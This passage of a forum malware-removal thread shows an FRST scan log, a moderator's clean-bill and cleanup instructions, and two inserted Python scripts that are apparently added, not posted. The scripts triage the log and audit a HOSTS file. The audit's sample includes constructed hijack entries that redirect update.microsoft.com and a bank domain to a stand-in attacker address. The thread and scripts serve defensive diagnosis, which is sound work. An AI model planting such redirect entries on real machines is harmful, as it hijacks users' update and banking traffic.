S4 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-08-23] (Ulead Systems, Inc.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [X]
S4 IAANTMON; C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2008-01-20] (Microsoft Corporation)
S1 Beep; no ImagePath
S3 PSMounterEx; C:\Windows\system32\drivers\psmounterex.sys [169992 2015-04-02] (Windows (R) Win 7 DDK provider)
S3 PSVolAcc; C:\Windows\System32\Drivers\PSVolAcc.sys [12760 2014-07-21] (Paramount Software UK Ltd)
S3 WIMMount; C:\Program Files\Macrium\Reflect\wimmount.sys [22096 2015-05-14] (Microsoft Corporation)
S0 iaStor; system32\DRIVERS\iaStor.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-26 08:43 - 2016-12-26 08:43 - 00012851 _____ C:\Users\Me\Desktop\FRST.txt
2016-12-26 08:41 - 2016-12-26 08:41 - 00000000 ___SD C:\ComboFix
2016-12-25 10:30 - 2016-12-25 10:30 - 00000000 ____D C:\Users\Me\Desktop\1ROMER
2016-12-24 12:17 - 2016-12-26 08:41 - 00000000 ____D C:\Users\Me\Desktop\fix
2016-12-23 08:24 - 2016-12-23 08:24 - 00899584 _____ (Farbar) C:\Users\Me\Desktop\FSS.exe
2016-12-22 15:02 - 2016-12-26 08:43 - 00000000 ____D C:\FRST
2016-12-22 15:01 - 2016-12-22 15:01 - 02420736 _____ (Farbar) C:\Users\Me\Desktop\FRST64.exe
2016-12-22 11:41 - 2016-12-24 12:15 - 00000000 ____D C:\Users\Me\Desktop\stuff
2016-12-22 07:46 - 2016-12-26 08:41 - 00000000 ____D C:\Qoobox
2016-12-22 07:46 - 2011-06-25 22:45 - 00256000 _____ C:\Windows\PEV.exe
2016-12-22 07:46 - 2010-11-07 09:20 - 00208896 _____ C:\Windows\MBR.exe
2016-12-22 07:46 - 2009-04-19 20:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00098816 _____ C:\Windows\sed.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00080412 _____ C:\Windows\grep.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00068096 _____ C:\Windows\zip.exe
2016-12-22 07:45 - 2016-12-22 07:58 - 00000000 ____D C:\Windows\erdnt
2016-12-22 07:25 - 2016-12-22 07:25 - 05659917 ____R (Swearware) C:\Users\Me\Desktop\ComboFix.exe
2016-12-20 11:30 - 2016-12-20 11:48 - 00000000 ____D C:\Users\Me\Desktop\house pics
2016-12-18 15:52 - 2016-12-18 15:52 - 00000000 ____D C:\Windows\CheckSur
2016-12-18 12:16 - 2016-12-18 12:16 - 00000000 ____D C:\65c7b20dc424bda6bd39db516b4d
2016-12-18 09:45 - 2016-12-18 09:45 - 00000000 ____D C:\2b654b41d190c0d9a397eb33

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-26 08:42 - 2006-11-02 05:33 - 00000000 ____D C:\Windows\inf
2016-12-26 08:40 - 2006-11-02 04:46 - 00758370 _____ C:\Windows\system32\PerfStringBackup.INI
2016-12-26 08:36 - 2006-11-02 07:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-26 08:36 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-26 08:36 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-26 08:35 - 2006-11-02 07:42 - 00032568 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-12-26 08:34 - 2016-11-18 12:30 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Mozilla
2016-12-26 08:33 - 2015-05-10 08:02 - 00001945 _____ C:\Windows\epplauncher.mif
2016-12-25 20:03 - 2016-05-06 12:01 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-25 14:04 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Macromedia
2016-12-23 19:57 - 2015-07-10 09:12 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Ghostery
2016-12-22 11:43 - 2006-11-02 07:21 - 00409496 _____ C:\Windows\system32\FNTCACHE.DAT
2016-12-22 07:58 - 2006-11-02 04:34 - 00000215 _____ C:\Windows\system.ini
2016-12-22 07:37 - 2015-07-09 06:57 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-22 07:30 - 2015-07-07 06:28 - 00000000 ____D C:\AdwCleaner
2016-12-17 10:26 - 2016-06-17 13:37 - 06858912 _____ (ESET spol. s r.o.) C:\Users\Me\Desktop\esetonlinescanner_enu.exe
2016-12-14 07:15 - 2015-05-10 07:22 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-13 11:04 - 2016-05-06 12:01 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-12-13 11:04 - 2016-05-06 12:01 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-12-13 11:04 - 2016-05-06 12:01 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-12-13 11:04 - 2015-05-10 10:30 - 00000000 ____D C:\Windows\system32\Macromed
2016-12-13 11:04 - 2008-08-18 10:23 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-12-13 08:32 - 2015-05-14 14:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-04 14:20 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Intelli-studio

==================== Files in the root of some directories =======

2015-05-10 07:00 - 2012-03-25 08:43 - 0000680 _____ () C:\Users\Me\AppData\Local\d3d9caps.dat
2015-05-10 07:00 - 2016-09-10 13:49 - 0001460 _____ () C:\Users\Me\AppData\Local\d3d9caps64.dat
2015-05-10 07:00 - 2016-03-31 07:42 - 0010240 _____ () C:\Users\Me\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-10 07:00 - 2013-03-18 16:21 - 0386444 _____ () C:\Users\Me\AppData\Local\dd_vcredistMSI25C2.txt
2015-05-10 07:00 - 2013-03-18 16:21 - 0011374 _____ () C:\Users\Me\AppData\Local\dd_vcredistUI25C2.txt
2015-06-09 07:44 - 2016-11-23 09:56 - 0020468 _____ () C:\ProgramData\hpzinstall.log
2015-05-10 05:55 - 2015-05-10 05:55 - 0005115 _____ () C:\ProgramData\N360BUOptions.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-26 08:32

==================== End of FRST.txt ============================
Attached Files
File Type: txt Addition.txt (27.6 KB, 4 views)
win98forever is offline  
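As an added illustration, not part of the post above and not FRST's own code: a short Python triage of the Services and Drivers lines in the FRST log format. It pulls out the entries a log reviewer checks first, images FRST marks [X] (file missing), entries with no ImagePath, and files reported as [File not signed], and orders them so that running unsigned code comes before stopped unsigned code and before orphaned entries. The sample lines are copied from the log above; the ranking rule is the script's own assumption, not an FRST feature.

```python
"""Triage the Services and Drivers sections of an FRST log.

Added example, not part of the forum post and not FRST's own code.  Each
entry line has the form

    <state><start> <name>; <image path> [<size> <date>] (<publisher>) [<flags>]

where the letter is R (running) or S (stopped), the digit is the Windows
service Start value (0 boot, 1 system, 2 automatic, 3 manual, 4 disabled),
FRST appends [X] when the image file is missing and [File not signed] when
the file carries no Authenticode signature.  Sample lines copied from the log.
"""
import re
from dataclasses import dataclass, field
from typing import List

SAMPLE = r"""
==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2008-04-03] (TOSHIBA Corporation.) [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
S4 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [3272656 2014-07-21] (Paramount Software UK Ltd)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [X]

===================== Drivers (Whitelisted) ======================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2008-01-20] (Microsoft Corporation)
S1 Beep; no ImagePath
S0 iaStor; system32\DRIVERS\iaStor.sys [X]
"""

ENTRY = re.compile(r"^([RSU])(\d)\s+(.+?);\s+(.*)$")
STATE = {"R": "running", "S": "stopped"}          # anything else reported as unknown
START = {"0": "boot", "1": "system", "2": "automatic", "3": "manual", "4": "disabled"}


@dataclass
class Entry:
    name: str
    state: str
    start: str
    image: str
    findings: List[str] = field(default_factory=list)


def parse_entries(text: str) -> List[Entry]:
    """Parse every service/driver line; section headers and FRST's own notes
    do not match the pattern and are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if not m:
            continue
        letter, digit, name, rest = m.groups()
        entry = Entry(name, STATE.get(letter, "unknown"), START.get(digit, "other"), rest)
        if rest == "no ImagePath":
            entry.findings.append("no ImagePath")
        if rest.endswith("[X]"):
            entry.findings.append("image file missing")
        if "[File not signed]" in rest:
            entry.findings.append("unsigned")
        entries.append(entry)
    return entries


def triage(text: str) -> List[Entry]:
    """Entries worth a second look, most urgent first (ranking is this
    script's assumption): running unsigned code, then stopped unsigned code,
    then orphaned entries ([X] / no ImagePath), which are usually leftovers
    of uninstalled software rather than malware."""
    def rank(e: Entry) -> int:
        if "unsigned" in e.findings:
            return 0 if e.state == "running" else 1
        return 2
    return sorted((e for e in parse_entries(text) if e.findings), key=rank)


if __name__ == "__main__":
    for e in triage(SAMPLE):
        print(f"{e.state:8} {e.start:10} {e.name}: {', '.join(e.findings)}")
```

Run against a saved FRST.txt by passing its contents to `triage()`. Note what the ranking does not say: an unsigned OEM binary from 2007 to 2010 (Toshiba, HP) is common on a Vista-era laptop and is not evidence of compromise on its own; verify such a file by hashing it and checking the hash against the vendor or a reputation service before acting, and treat [X] entries as cleanup candidates rather than infections.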
Old 12-26-2016, 09:22 AM   #18
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



I restarted and MSE updated normally.
win98forever is offline  
Old 12-26-2016, 06:57 PM   #19
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever. If there are no other problems...

Congratulations. Well done! Your logs appear clean. You should be good to go.

Please disable Security Essentials before uninstalling ComboFix and then re-enable it after doing so.

Press the Windows logo key and R, then copy/paste the following single-line command into the Run box and click OK:

combofix /uninstall

This will uninstall ComboFix and delete ComboFix's quarantine folder. It will also implement some cleanup procedures, remove old System Restore Points which contain previous infections, and create a fresh, clean System Restore Point.

Please re-enable your antivirus program and any other antispyware programs disabled earlier if you haven't already.
  • Run AdwCleaner and select Uninstall
  • Confirm by clicking Yes
------------------------------------------------------

You can safely delete any tools downloaded or any logs, files, and any shortcuts on your desktop that were created during this fix.

Keep MBAM; update it and run a scan ('Threat Scan' by default, or 'Scan Now' under the Dashboard tab) weekly.

Empty your Recycle Bin if it does not do so automatically.

------------------------------------------------------

Please read this and, if possible, contribute as much as you can:

https://www.bleepingcomputer.com/anno...dom-of-speech/

------------------------------------------------------

MICROSOFT UPDATES
It is very important that you get all of the critical updates for your Operating System and Internet Explorer. Keeping your OS and browser up to date will help make you less susceptible to attacks by Trojans and viruses. Please go to Microsoft and download all the critical updates to help prevent possible re-infection.

------------------------------------------------------

SPYWARE PREVENTION
In light of your recent problem, I'm sure you'd like to avoid any future infections. Please read this well-written article: To help protect your computer in the future, I recommend that you get the following free programs if you do not already have them:
  • WOT, Web of Trust, warns you about risky websites that try to scam visitors, deliver malware, or send spam. Protect your computer against online threats by using WOT as your front-line layer of protection when browsing or searching in unfamiliar territory. WOT's color-coded icons show you ratings for 21 million websites, helping you avoid the dangerous sites:
    • Green to go
    • Yellow for caution
    • Red to stop
    WOT has an add-on available for IE, Firefox, and Chrome.
  • MVPS HOSTS FILE replaces your current HOSTS file with one that will restrict known ad sites from serving you unsolicited advertisements. It basically prevents your computer from connecting to those sites by redirecting them to 127.0.0.1, which is the IP of your local computer. See guide here and for Windows Vista here
Keep your antivirus program and antispyware programs updated and scan with them on a regular basis.

Please respond to this thread one more time so we can mark this thread as resolved.
chemist is offline  
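The MVPS HOSTS approach described above works by mapping ad and tracker names to 127.0.0.1 (or 0.0.0.0), so the connection never leaves the machine. The same file is also a classic hijack point: malware adds entries that send update servers or security-vendor names to an address it controls, and the symptom is exactly "updates stopped working". The Python audit below is an added example, not part of the post above; it separates sinkhole entries (loopback or unspecified targets, the MVPS pattern) from entries that point a name at a routable address. The hosts text is constructed, not taken from this machine; the two routable lines and the address 198.51.100.7 are invented to show what a hijacked entry looks like.

```python
"""Audit a Windows HOSTS file.

Added example, not part of the forum post.  Splits entries into
"sinkhole" (name mapped to a loopback or unspecified address, which is
what the MVPS HOSTS file does to ad and tracker names) and "redirect"
(name mapped to a routable address, the pattern a hijacked HOSTS file
shows).  The sample text below is constructed; 198.51.100.7 is a
documentation address standing in for an attacker-controlled host.
"""
import ipaddress
import sys
from typing import Dict, List, Tuple

SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# [Start of entries generated by MVPS HOSTS]
0.0.0.0  ad.doubleclick.net
0.0.0.0  adserver.example   # trailing comment is ignored
127.0.0.1  tracker.example
# constructed hijack entries: a routable address for real names
198.51.100.7  update.microsoft.com
198.51.100.7  www.example-bank.com
"""

# Stock mappings every Windows hosts file may carry; not worth reporting.
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs; comments and malformed lines are skipped."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop full-line and trailing comments
        if not line:
            continue
        fields = line.split()
        address, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(address)
        except ValueError:
            continue                              # first field is not an address; do not guess
        for name in names:
            pairs.append((address, name.lower()))
    return pairs


def classify(address: str) -> str:
    """'sinkhole' for 127.x / ::1 / 0.0.0.0 targets, 'redirect' for anything routable."""
    addr = ipaddress.ip_address(address)
    return "sinkhole" if addr.is_loopback or addr.is_unspecified else "redirect"


def audit_hosts(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Group hosts entries by kind, dropping the stock localhost mappings."""
    report: Dict[str, List[Tuple[str, str]]] = {"sinkhole": [], "redirect": []}
    for address, name in parse_hosts(text):
        kind = classify(address)
        if kind == "sinkhole" and name in DEFAULT_NAMES:
            continue
        report[kind].append((address, name))
    return report


if __name__ == "__main__":
    # Usage: python hosts_audit.py [C:\Windows\System32\drivers\etc\hosts]
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_HOSTS
    result = audit_hosts(source)
    print(f"{len(result['sinkhole'])} sinkhole entries (blocking; expected with MVPS HOSTS)")
    for address, name in result["redirect"]:
        print(f"REVIEW: {name} -> {address} (routable target; confirm this is intentional)")
```

A large sinkhole count is expected once the MVPS file is installed; any entry in the redirect list needs a reason, because a legitimate hosts file almost never points a public name at a routable address. Run it with no argument to see the constructed sample, or pass the path of the real hosts file on the machine being checked.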
Old 12-26-2016, 08:14 PM   #20
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



I did as suggested. I also looked at the programs and found something called Speccy, installed April 18, which I have deleted. I have no recollection of it and do not need it.

Thank You
win98forever is offline  
 
